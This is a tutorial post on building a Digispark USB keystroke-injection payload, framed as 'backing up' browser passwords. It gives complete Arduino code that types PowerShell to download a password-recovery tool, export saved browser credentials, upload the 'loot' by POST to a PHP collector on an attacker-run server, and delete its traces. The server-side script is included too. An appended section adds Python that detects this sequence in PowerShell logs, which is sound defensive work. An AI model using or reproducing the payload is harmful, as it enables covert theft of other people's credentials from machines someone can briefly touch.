Backing up browser passwords with Digispark
Pointless chapter
Since a lot of people liked my “1$ USB Rubber Ducky alternative” tutorial, I would like to make more “Payload threads” so that the people who missed the original thread could see this and get interested in developing keystroke injection scripts.
Okay okay, I’ll do another one.
Introduction
So imagine you own a lot of computers with different passwords saved on them, and one day you decide to move all of your passwords to one place.
To do this you would need to go to every computer, download a program, export the passwords and upload them to a flash drive or something.
Well today pikami has a solution for you!
Let’s make a script that does all those things auto-magically!
For the purpose of this tutorial I will not go through setting up the Digispark dev environment; for that, take a look at
1$ USB Rubber Ducky alternative
What exactly are we going to do?
- Set up our web server to save incoming passwords
- Write a script that:
  - Downloads a password recovery tool
  - Uses the tool to export browser passwords
  - Uploads exported passwords back to our server
What you’ll need
- Digispark
- Arduino software
- Web server
The process
Setting up the web server
I’ll assume you already have Apache/nginx with PHP running on your server.
First you have to upload the password recovery tool to your server. For this tutorial we’ll be using WebBrowserPassView by NirSoft (link will be at the bottom of the post).
I downloaded it, named it pw.exe and placed it in the root directory of the server
Let’s create a directory for our password exports
mkdir log
Now let’s make a php upload script that saves all the data it gets to a file:
<?php
$file = "log/" . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>
I copied this script from a Hak5 tutorial (link will be at the bottom of the post)
The server is now set up
Writing the script for Digispark
Okay, so the first thing we need to do is write a PowerShell script that does what we need. At first the script should go somewhere that wouldn’t bother the user: the Windows TEMP directory is a great place
$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir
Then it should create its own directory so that it is easy to clean up after ourselves: “pw” is a perfect name
mkdir pw
cd pw
Now the script should download the password recovery tool from our server and use it to export the passwords (the “| Out-Null” will force PowerShell to wait until the execution is finished)
Invoke-WebRequest "https://YOUR_SERVER/pw.exe" -OutFile "pw.exe" | Out-Null
.\pw.exe /scomma pw.txt | Out-Null
Then it should upload the loot to our server
Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null
Let’s clean up after ourselves, shall we?
cd ..
Remove-Item pw -recurse
Now that we have our script let’s program the Digispark to execute it
#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Open powershell
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("powershell");
  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(1000);

  // Execute code from the interwebs
  DigiKeyboard.print("$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;Invoke-WebRequest \"https://YOUR_SERVER/pw.exe\" -OutFile \"pw.exe\" | Out-Null;.\\pw.exe /scomma pw.txt | Out-Null;Invoke-RestMethod -Uri \"https://YOUR_SERVER/upload.php\" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse");
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

  while(true){
    // do nothing
  }
}
You have done it
Congratulations! You can now back up the passwords from all those computers you own!
If everything is done correctly your exported passwords should be located on your servers, let’s look at what I got:
Sorry if you wanted to see more, I don’t save passwords in browsers
Final notes
So @KuhakuWolf I hope you’re happy.
On a real note, I hope you all learned something from this and start developing your own payloads.
I would love to see your creations and as always, if you have any questions just ask, I’ll be happy to help.
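Seen from the defending side, the commands typed by the Digispark in this post show up in PowerShell script block logging (Event ID 4104) as a download, export, upload sequence inside one PowerShell process. The Python code below is an added example, not part of the original post: the record fields (host, pid, text) and the sample events are constructed for illustration, and it goes slightly beyond the page by also matching the other NirSoft-style save switches next to /scomma.

```python
import re
from collections import defaultdict

# One pattern per stage of the typed payload, matched per statement.
STAGES = {
    # An executable fetched to disk over HTTP(S)
    "download_exe": re.compile(r"\b(Invoke-WebRequest|iwr)\b.*-OutFile\s+\S*\.exe\b", re.I),
    # NirSoft-style "save to file" switch; /scomma is the one used on the page
    "password_export": re.compile(r"\.exe\S*\s+/s(comma|text|tab|html|xml)\b", re.I),
    # A local file sent as the body of an HTTP POST
    "file_upload": re.compile(
        r"^(?=.*\b(Invoke-RestMethod|irm|Invoke-WebRequest|iwr)\b)"
        r"(?=.*-Method\s+Post\b)(?=.*-InFile\b)", re.I),
}

def stages_in(script_text):
    """Return the set of payload stages present in one script block."""
    found = set()
    for stmt in re.split(r"[;\r\n]+", script_text):
        found.update(n for n, rx in STAGES.items() if rx.search(stmt.strip()))
    return found

def triage(events):
    """Merge script blocks per (host, pid) and rate each PowerShell session."""
    sessions = defaultdict(set)
    for ev in events:
        sessions[(ev["host"], ev["pid"])] |= stages_in(ev["text"])
    # An upload combined with a download or an export is worth an analyst's time.
    return {key: ("high" if len(st) == 3 else "medium")
            for key, st in sessions.items()
            if "file_upload" in st and len(st) >= 2}

# Constructed sample records (assumed fields: host, pid, text of the script block).
PAGE_PAYLOAD = (
    'Invoke-WebRequest "https://YOUR_SERVER/pw.exe" -OutFile "pw.exe" | Out-Null;'
    '.\\pw.exe /scomma pw.txt | Out-Null;'
    'Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post '
    '-InFile pw.txt -UseDefaultCredentials | Out-Null'
)
SAMPLE = [
    {"host": "WS-01", "pid": 4120, "text": PAGE_PAYLOAD},
    {"host": "WS-02", "pid": 988, "text": ".\\pw.exe /scomma pw.txt | Out-Null"},
    {"host": "WS-02", "pid": 988, "text": "Invoke-RestMethod -Uri https://example.test/u -Method Post -InFile pw.txt"},
    {"host": "WS-03", "pid": 77, "text": "Invoke-WebRequest https://example.test/setup.exe -OutFile setup.exe"},
    {"host": "WS-04", "pid": 512, "text": "Invoke-RestMethod -Uri https://example.test/api -Method Post -Body $json"},
]

if __name__ == "__main__":
    for (host, pid), severity in triage(SAMPLE).items():
        print(f"{severity:6} {host} pid={pid}")
```

Commands typed one per line arrive as separate script blocks, which is why the stages are merged per process before rating; a lone installer download or a JSON POST stays below the alert threshold.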